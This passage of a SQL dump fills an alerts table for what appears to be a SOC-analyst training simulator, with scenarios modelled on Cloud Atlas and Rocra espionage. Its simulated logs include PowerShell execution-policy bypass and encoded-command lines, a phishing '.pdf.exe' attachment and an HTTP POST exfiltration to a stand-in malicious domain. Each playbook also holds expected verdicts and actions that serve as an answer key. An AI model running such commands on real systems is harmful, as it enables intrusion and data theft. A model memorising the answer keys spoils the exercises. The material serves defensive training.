'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(539, 'Cloud Atlas Malware Execution', 'high', 'Endpoint detection and response (EDR) logs', 'Upon successful initial access, the Cloud Atlas malware is executed on the target systems, utilizing PowerShell scripts to maintain stealth and execute remote commands.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\deployUpdate.ps1\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"deployUpdate.ps1\",\"event_description\":\"PowerShell script executed for potential remote command execution\",\"os_version\":\"Windows 10 Pro\",\"device_name\":\"DESKTOP-AB123CD\"}', '2026-01-07 22:29:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a company asset\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with Cloud Atlas\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"deployUpdate.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal File Inventory\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file not commonly used in environment\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"clean\",\"details\":\"Active employee with system access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(540, 'Encrypted Data Exfiltration via Cloud Storage', 'high', 'Network traffic analysis', 'Network traffic analysis has identified suspicious encrypted data transfers from an internal system to a cloud storage service. The data is believed to be encrypted diplomatic communications exfiltrated to a Google Drive account, potentially for malicious purposes.', 'Exfiltration', 'T1567.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"35.190.247.1\",\"src_port\":443,\"dst_port\":443,\"protocol\":\"HTTPS\",\"user\":\"j.doe@diplomacy.gov\",\"filename\":\"encrypted_comm_20231015.bin\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"cloud_service\":\"Google Drive\",\"action\":\"upload\",\"bytes_sent\":1048576,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\"}', '2026-01-07 22:29:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal host suspected to be compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"35.190.247.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Google Cloud\",\"verdict\":\"suspicious\",\"details\":\"Google Drive IP used for potential data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with encrypted payload used in exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"encrypted_comm_20231015.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File suspected to contain sensitive encrypted communications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(541, 'Unauthorized Access Detected', 'high', 'Email Gateway Logs', 'Rocra initiates its attack by sending spear-phishing emails containing malicious attachments to gain initial foothold in the network.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"email_id\":\"c2c9d5a3-5b4f-4099-a6e5-124ae6d2b5f7\",\"from\":\"attacker@example.malicious\",\"to\":\"user@targetcompany.com\",\"subject\":\"Urgent: Update Your Account Information\",\"attachment\":\"Invoice_Update_2023.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.45\",\"username\":\"jdoe\",\"malware_family\":\"Rocra\"}', '2026-01-07 22:29:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@example.malicious\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain associated with Rocra.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Rocra malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"IP address linked to Rocra command and control servers.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_Update_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern commonly used in phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Unauthorized Access Detected\",\"date\":\"2026-02-01T20:32:22.160Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(542, 'Execution of Malicious Payload', 'high', 'Endpoint Security Alerts', 'Once access is achieved, the Rocra malware executes its payload, allowing attackers to remotely control infected machines. This step indicates the execution phase of the attack with potential remote control capabilities.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:05Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"username\":\"john.doe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"file_name\":\"Rocra_Payload.exe\",\"action\":\"Execution\",\"status\":\"Success\",\"severity\":\"High\"}', '2026-01-07 22:29:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Rocra APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Rocra malware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Rocra_Payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"Filename detected during execution of Rocra malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR\",\"verdict\":\"clean\",\"details\":\"Legitimate internal user.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(543, 'Establishing Backdoor for Persistence', 'high', 'Network Traffic Analysis', 'Rocra sets up a backdoor on the compromised systems, enabling persistent access even after reboots or network changes. Network traffic indicates communication with a known malicious IP and the transfer of a backdoor executable.', 'Persistence', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"destination_port\":80,\"event_type\":\"network\",\"file\":{\"name\":\"backdoor.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user\":\"compromised_user\",\"action\":\"file_download\",\"status\":\"success\"}', '2026-01-07 22:29:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Rocra APT.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Rocra backdoor executable.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"File name associated with malicious activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User account exhibiting unusual behavior.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(544, 'Stealthy Lateral Movement', 'high', 'Active Directory Logs', 'Rocra uses stolen credentials to move laterally within the network, searching for sensitive diplomatic and research data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_id\":\"4624\",\"logon_type\":3,\"target_username\":\"jdoe\",\"target_domain\":\"CORP\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"10.10.3.15\",\"authentication_package\":\"Kerberos\",\"logon_process\":\"NtLmSsp\",\"subject_user_name\":\"admin_elevated\",\"subject_domain_name\":\"CORP\",\"subject_logon_id\":\"0x3E7\",\"hashes\":[\"f5d8ee39d9f9a6bfcf7e9e8ae281d756\"],\"event_description\":\"An account was successfully logged on.\"}', '2026-01-07 22:29:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scanning\",\"verdict\":\"internal\",\"details\":\"Internal IP used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.3.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"network_logs\",\"verdict\":\"internal\",\"details\":\"Destination IP for the lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_activity_monitoring\",\"verdict\":\"suspicious\",\"details\":\"Stolen credentials used for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f5d8ee39d9f9a6bfcf7e9e8ae281d756\",\"is_critical\":false,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Potentially associated with known APT activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(545, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) Alerts', 'The final stage sees Rocra exfiltrating targeted data, including encrypted and previously deleted files, marking the success of their espionage mission.', 'Exfiltration', 'T1567 - Exfiltration Over Web Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:32:00Z\",\"event\":\"data_exfiltration\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"filename\":\"encrypted_project_files.zip\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"exfil_method\":\"HTTP POST\",\"destination_url\":\"http://malicious-domain.com/upload\",\"associated_user\":\"jdoe@company.com\",\"alert_id\":\"DLP-2023-5678\",\"indicator_of_compromise\":[\"IP:203.0.113.45\",\"HASH:b1946ac92492d2347c6235b4d2611184\",\"URL:http://malicious-domain.com/upload\"]}', '2026-01-07 22:29:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malware samples.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"URL used for data exfiltration in previous incidents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.168Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:32:00Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"encrypted_project_files.zip\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"exfil_method\\\":\\\"HTTP POST\\\",\\\"destination_url\\\":\\\"http://malicious-domain.com/upload\\\",\\\"associated_user\\\":\\\"jdoe@company.com\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\",\\\"indicator_of_compromise\\\":[\\\"IP:203.0.113.45\\\",\\\"HASH:b1946ac92492d2347c6235b4d2611184\\\",\\\"URL:http://malicious-domain.com/upload\\\"]}\"},{\"timestamp\":\"2026-02-01T20:31:22.168Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:32:00Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"encrypted_project_files.zip\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"exfil_method\\\":\\\"HTTP POST\\\",\\\"destination_url\\\":\\\"http://malicious-domain.com/upload\\\",\\\"associated_user\\\":\\\"jdoe@company.com\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\",\\\"indicator_of_compromise\\\":[\\\"IP:203.0.113.45\\\",\\\"HASH:b1946ac92492d2347c6235b4d2611184\\\",\\\"URL:http://malicious-domain.com/upload\\\"]}\"},{\"timestamp\":\"2026-02-01T20:30:22.168Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:32:00Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"encrypted_project_files.zip\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"exfil_method\\\":\\\"HTTP POST\\\",\\\"destination_url\\\":\\\"http://malicious-domain.com/upload\\\",\\\"associated_user\\\":\\\"jdoe@company.com\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\",\\\"indicator_of_compromise\\\":[\\\"IP:203.0.113.45\\\",\\\"HASH:b1946ac92492d2347c6235b4d2611184\\\",\\\"URL:http://malicious-domain.com/upload\\\"]}\"},{\"timestamp\":\"2026-02-01T20:29:22.168Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:32:00Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"encrypted_project_files.zip\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"exfil_method\\\":\\\"HTTP POST\\\",\\\"destination_url\\\":\\\"http://malicious-domain.com/upload\\\",\\\"associated_user\\\":\\\"jdoe@company.com\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\",\\\"indicator_of_compromise\\\":[\\\"IP:203.0.113.45\\\",\\\"HASH:b1946ac92492d2347c6235b4d2611184\\\",\\\"URL:http://malicious-domain.com/upload\\\"]}\"},{\"timestamp\":\"2026-02-01T20:28:22.168Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:32:00Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"encrypted_project_files.zip\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"exfil_method\\\":\\\"HTTP POST\\\",\\\"destination_url\\\":\\\"http://malicious-domain.com/upload\\\",\\\"associated_user\\\":\\\"jdoe@company.com\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\",\\\"indicator_of_compromise\\\":[\\\"IP:203.0.113.45\\\",\\\"HASH:b1946ac92492d2347c6235b4d2611184\\\",\\\"URL:http://malicious-domain.com/upload\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(546, 'Suspicious Email Attachment Detected', 'high', 'Email Gateway Logs', 'A spear-phishing email containing a malicious attachment was detected targeting key personnel within the organization. The email originated from a known malicious IP address and contained a file with a suspicious hash linked to advanced persistent threat (APT) activities.', 'Initial Access', 'T1566.001', 1, 'resolved', 34, '{\"timestamp\":\"2023-10-15T08:42:00Z\",\"email_subject\":\"Urgent: Review the Attached Document\",\"source_ip\":\"203.0.113.45\",\"destination_email\":\"j.doe@organization.com\",\"attachment_name\":\"Invoice_October2023.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"sender_email\":\"finance@truste-partners.com\",\"recipient_ip\":\"192.168.1.15\"}', '2026-01-07 22:33:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash linked to document-based malware used in spear-phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"finance@truste-partners.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email address not recognized and associated with recent phishing attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Attachment Detected\",\"date\":\"2026-02-01T20:32:22.170Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(547, 'Unauthorized Code Execution Detected', 'critical', 'Endpoint Detection and Response (EDR) System', 'Upon opening the attachment, a sophisticated malware payload is executed, initiating the deployment of espionage modules.', 'Execution', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:32:15Z\",\"event_id\":\"4625\",\"event_source\":\"Microsoft-Windows-Security-Auditing\",\"computer_name\":\"victim-machine.local\",\"user\":{\"domain\":\"victim-domain\",\"name\":\"john.doe\",\"full_name\":\"John Doe\"},\"process\":{\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\john.doe\\\\Documents\\\\malicious_script.ps1\"},\"network\":{\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443},\"file\":{\"name\":\"malicious_script.ps1\",\"path\":\"C:\\\\Users\\\\john.doe\\\\Documents\\\\malicious_script.ps1\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}}', '2026-01-07 22:33:18', '2026-02-16 18:18:48', 